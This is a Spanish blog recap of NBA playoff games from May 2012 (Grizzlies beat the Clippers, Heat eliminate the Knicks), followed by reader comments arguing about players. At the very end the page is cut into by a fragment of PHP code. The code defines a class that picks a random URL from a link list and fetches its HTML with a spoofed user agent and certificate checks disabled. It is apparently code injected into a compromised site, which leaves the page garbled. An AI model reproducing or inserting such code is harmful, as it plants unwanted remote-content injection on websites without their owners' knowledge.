La Crónica: Pasan los Heat, tiemblan los Clippers

10 de May de 2012 por txusma

Alerta roja en los Clippers. No porque perdieran el quinto partido de la serie ante los Grizzlies (80-92), cosa que entraba en el terreno de lo probable, sino porque Chris Paul y Blake Griffin acabaron el encuentro lesionados. Especialmente preocupante es lo de CP3, que se resintió de los problemas musculares que ya le obligaron a perderse un partido en el tramo final de regular season y, a la espera de noticias sobre el alcance de la lesión, ha de ser considerado como duda para el trascendental sexto encuentro de la serie, mañana viernes en Memphis. Esto no ha de eclipsar, sin embargo, la victoria de los Grizzlies, que volvieron a enmarañarse cuando lo tenían todo a favor pero que, en esta ocasión, fueron capaces de reponerse a tiempo para atar el triunfo y alargar la serie al menos un partido más. Un espectacular final de primer cuarto de Zach Randolph rompió la igualdad inicial y la brecha fue creciendo hasta los 24 puntos (51-75). Z-Bo y Marc Gasol dominaban las zonas y el partido parecía sentenciado. Pero un parcial de 24-6 favorable a los Clippers instaló en el FedEx Forum por un momento una sensación de déjà vu. A diferencia del primer partido de la eliminatoria, los Grizzlies no se hundieron y los puntos de Conley, Gay y Randolph salvaron la victoria.

Hasta aquí llegaron los Knicks. Los Heat apenas han tenido que esforzarse para cerrar la eliminatoria con un 4-1. Anoche (94-106), como venía siendo norma en toda la serie, dominaron en cada aspecto del juego. Comandados por LeBron James, a los Heat les bastó con dominar el rebote y controlar el ritmo del juego. El acierto en los triples de Chalmers, Battier y Miller fue la guinda, y contrasta con el 3 de 15 en tiros de JR Smith (el segundo 3/15 consecutivo por su parte). Melo cumplió, aunque muchos de sus 35 puntos llegaron con el partido sentenciado. A Stoudemire no se le puede pedir mucho más, dado que juega con una mano, e incluso Bibby y Fields cumplieron. Pero ni en su mejor estado de forma era de esperar que eliminasen a los Heat, menos aún con todos los problemas que han acumulado los de NY de cara a esta serie. De todos modos, las lesiones de Lin, Baron Davis y Shumpert, la gripe de Tyson Chandler y la mano de Amaré no han de esconder que a los Knicks les queda mucho camino por recorrer si lo que pretenden es establecerse entre la elite de la liga. Los Heat tiene mucho más claro su futuro, al menos el inmediato: una segunda ronda contra los Pacers.

PREMIOS

wadebronMVP: LeBron James y Carmelo Anthony protagonizaron un gran duelo que acabó en tablas. Solo la victoria de Lebron (y sus 29 puntos, 8 rebotes y 7 asistencias) le otorga el MVP de la jornada. Marc Gasol también tuvo una actuación destacada con 23 puntos, 7 rebotes y 4 asistencias.

Rookie: Ayer no hubo sitio para los más jóvenes.

Sorpresa: Mike Bibby anotó 8 puntos en el primer cuarto para un total de 10. Y además cogió 6 rebotes y repartió 6 asistencias.

Decepción: Horribilísimo partido de JR Smith. 3 de 15 en tiros de campo, 0 asistencias, 0 rebotes, 0 robos, 0 tapones, 2 pérdidas y un -20 de los Knicks con él en la cancha. Lo curioso es que jugara 36 minutos.

Esfuerzo en vano: Carmelo Anthony se fue a los 35 puntos y 8 rebotes pero no fue suficiente para alargar la serie. Chris Paul acabó el partido con 19 puntos, 6 rebotes, 4 asistencias y 4 robos.

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Nacho dice:
    #1

    La primera parte de los Grizzlies demuestra que son un equipazo cuando juegan a lo que tienen que jugar. Partidazo de Marc y Zach. Lo que flipo con los ositos es que no sepan jugar en las trincheras, teniendo a Allen y a Zach. Mediado el tercer cuarto los Clippers se pusieron a la ‘griega’, asumiendo técnicas, pero consiguiendo lo importante, desestabilizando a los rivales, eso ayudado por la manita de Mo Willians hizo temblar al FedEx. Impresionante el silencio (o runrún, que no sé que es peor) cuando se pusieron a 8 los angelinos.
    La serie está clara: no se sabe qué pasará. Si Memphis es capaz de hacer su juego, sin pájaras sangrantes y sin caer en el juego de guerrillas, tienen más opciones, pero Paul, Mo y compañía son muy listos y van a llevar el partido a su terreno. Soy yo el GM de los Grizzlies y me traigo a Obradovic para estos dos partidos, (lástima que esté en Estambul)

      Citar

  2. TheDeerHunter dice:
    #2

    En las victorias de los Clippers: Gay 58 tiros vs 47 de Marc y Zach (incluyendo el anterior partido en el que Marc lanzó un par de tiros)
    Victorias de Grizzlies Gay 27 vs Marc-Zach 45 …

    ¿casualidad? ¿ha vuelto el “no me chilles que no te veo”?
    ¿quién ponía el grito en el cielo cuando decíamos al principio de curso que la vuelta de Gay no era una mejora tan evidente como cabría?
    A los hechos me remito.

      Citar

  3. HisRoyalAirness dice:
    #3

    Tienes toda la razón Deer. Nadie puede negar el potencial anotador de Gay pero tiene que asumir un rol secundario. En los partidos que “lidera” los Grizzlies palman. Decía el otro día un comentarista, “es que cobra 17 millones y tiene que asumir responsabilidad acorde”, yo digo: me suda los coj***s, si ese es el problema lo traspasas y punto. El tipo consigue su primera canasta en juego y se pone a celebrarla solo y tiene que decirle Gasol desde el banquillo que baje a defender, en fin… De todos modos si llegan a cruzarse con OKC su emparejamiento con Durant, por tamaño y movilidad, se antoja fundamental.
    El dominio de Marc y Z-Bo en el primer cuarto fue insultante, no los paraba nadie, esa es la gran virtud de los ositos, sus interiores. Me encanta ver que Zach está casi recuperado y ver esos movimientos de codos en el poste y esa energía animal underground.

    Respecto a Knicks, yo largaba YA a Amare sin pensármelo. Carmelo será lo que queráis pero es el mejor jugador de largo. Las comparativas con Lebron me parecen injustas, si tuviese Melo tantos compañeros a los que les hicieran dobles marcas otro gallo cantaría. La culpa de lo que se pagó en el trade no fue suya.

      Citar

  4. MagicJohnson32 dice:
    #4

    HisRoyalAirness:
    Respecto a Knicks, yo largaba YA a Amare sin pensármelo. Carmelo será lo que queráis pero es el mejor jugador de largo. Las comparativas con Lebron me parecen injustas, si tuviese Melo tantos compañeros a los que les hicieran dobles marcas otro gallo cantaría. La culpa de lo que se pagó en el trade no fue suya.

    En realidad sí que tiene buena parte de la culpa. Forzó el traspaso durante la temporada, en lugar de esperar al verano.

      Citar

  5. HisRoyalAirness dice:
    #5

    MagicJohnson32: En realidad sí que tiene buena parte de la culpa. Forzó el traspaso durante la temporada, en lugar de esperar al verano.

    De eso nada, eso fue cosa de Dolan. En vez de esperar a que fuese FA prefirió traspaso. Al menos es lo que yo he leído en todos lados

      Citar

  6. HisRoyalAirness dice:
    #6

    A todo esto, la prensa yanki está quemadísima con el flopping descarado que están haciendo los Clippers. Incluso prensa angelina afín lo comenta y dice que no les beneficia dar esa imagen

      Citar

  7. MagicJohnson32 dice:
    #7

    HisRoyalAirness: De eso nada, eso fue cosa de Dolan. En vez de esperar a que fuese FA prefirió traspaso. Al menos es lo que yo he leído en todos lados

    Hombre, claro que fue cosa de Dolan, que nadie le obligó a hacer el traspaso. Pero vuelvo a decir que Melo tuvo su parte de culpa, no fue lo suficientemente inteligente como para acabar la temporada en Denver y marcharse entonces a NY.

      Citar

  8. txusma dice:
    #8

    HisRoyalAirness:
    A todo esto, la prensa yanki está quemadísima con el flopping descarado que están haciendo los Clippers. Incluso prensa angelina afín lo comenta y dice que no les beneficia dar esa imagen

    Chris Paul es todo un maestro… Entre el flooping y las leches que pega Blake Griffin cuando machaca (ver el “poster” a Pau Gasol) me están empezando a caer algo mal.

      Citar

  9. MagicJohnson32 dice:
    #9

    txusma: Chris Paul es todo un maestro… Entre el flooping y las leches que pega Blake Griffin cuando machaca (ver el “poster” a Pau Gasol) me están empezando a caer algo mal.

    ¿Visteis el flop de Chris Paul ante un árbitro? Fue en el 4º partido.

      Citar

  10. HisRoyalAirness dice:
    #10

    txusma: Chris Paul es todo un maestro… Entre el flooping y las leches que pega Blake Griffin cuando machaca (ver el “poster” a Pau Gasol) me están empezando a caer algo mal.

    A mí me caen bastante mal ambos. El Griffin con tanto mate y tanto hype siendo de LA se lo tiene muy creído y de momento no es nadie. Cuando le hizo el poster a Pau (falta clarísima) y se pone a hacerle esos gestos merecía una reprimenda Old-School. El respeto a los veteranos era algo muy habitual antes y ahora se lo pasan por el forro estos niñatos.

    CP3 otro tanto de lo mismo, es un crack pero es un chulo asqueroso. Otro conflicto con Pau, cuando le llamó “soft” sin venir a cuento; si mido yo 2’16 le suelto una ostia que le quito la tontería.
    El problema del flopping siendo All-Star y de una ciudad como Los Angeles es que los árbitros están pasando por el aro demasiado. Pero vamos, que si pasan de ronda Pop y Tim ya les sacaran la tontería

      Citar

  11. MagicJohnson32 dice:
    #11

    Brutal el dato que acabo de leer:

    Tiros de Carmelo Anthony y J.R. Smith durante la serie contra Miami: 200.
    Tiros del resto del equipo: 121.

    Juaaaasssssss.

      Citar

  12. simon dice:
    #12

    a ver que pasa con lo de Griffin pero es que se veia venir, si solo sabes saltar y machacar halla quien halla debajo del aro pasa que algun dia lo pisaras o caeras mal y te volveras a hacer la rodilla polvo. no siempre se puede ir al aro con la venda puesta…

      Citar

  13. Heineken dice:
    #13

    Harden mejor 6º hombre

      Citar

  14. GreenPride dice:
    #14

    Esta vez los Grizzlies sobrevivieron pero les faltó muy poco para volver a ahogarse en la orilla. El partido comenzó con los Grizzlies por una vez con las cosas claras. Balones a sus dos interiores y Marc-ZBo se comieron literalmente a los Clippers. Concentrados, agresivos y recibiendo buenos balones abrieron una gran brecha. Hasta mitad del tercer cuarto la cosa parecía clara, pero ahí los Clippers tiraron de experiencia y un poco de marrulería y ensuciaron el partido. Unas cuantas técnicas, unos cuantos mamporros, a Memphis que se le olvida cómo debe jugar y empieza a jugar 1×1 de Gay, Conley o Mayo en vez de jugar inside-out como habían hecho y los Clips empiezan la remontada hasta llegar a 8 y posesión. La lesión de Paul puede que les impidiera llegar más lejos.
    Y ahora la gran duda para el 6º ¿Estarán recuperados Griffin y Paul? Jugar van a jugar seguro pero si no están al 100% será muy complicado para los Clippers. Por Memphis este partido es una lección de qué deben y qué no deben hacer. Si son consecuentes, dan un rol secundario a Gay y meten balones dentro tendrán opciones de pasar la eliminatoria, si se olvidan de esto y empiezan a mandar balones a Gay y los exteriores para que sean ellos los que guíen el ataque acabarán fuera de PO. Si Paul está bien y viendo lo flojos mentalmente que están los Grizzlies, apuesto por que pasarán los de LA en el 6º
    En cuanto a los Knicks, con las lesiones demasiado han hecho. Con el equipo completo nadie les daba más de un par de partidos así que han estado en lo esperado. Clarísimamente inferiores a Miami que ahora tendrá una piedra de toque de más nivel en los Pacers un equipo que les puede hacer pupa por dentro y que tiene muy buenos jugadores exteriores. Es hora de ver si además los Pacers tienen la dureza mental y algún líder que les lleve a pelear las series. La clave será ver si los Pacers son capaces de para a los Heat en defensa y si Hibbert-West consiguen imponerse por dentro para abrir huecos a Granger. Si no es así Granger tendrá problemas con la defensa de LeBron o Wade. Importante será también que George-Hill-Collison dominen claramente a los bases de los Heat y les fuercen a hacer ayudas sobre ellos. Yo creo que les harán sudar algo más pero no creo que se vean realmente en el alambre por lo que mi pronóstico es Heat en 5 o 6

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>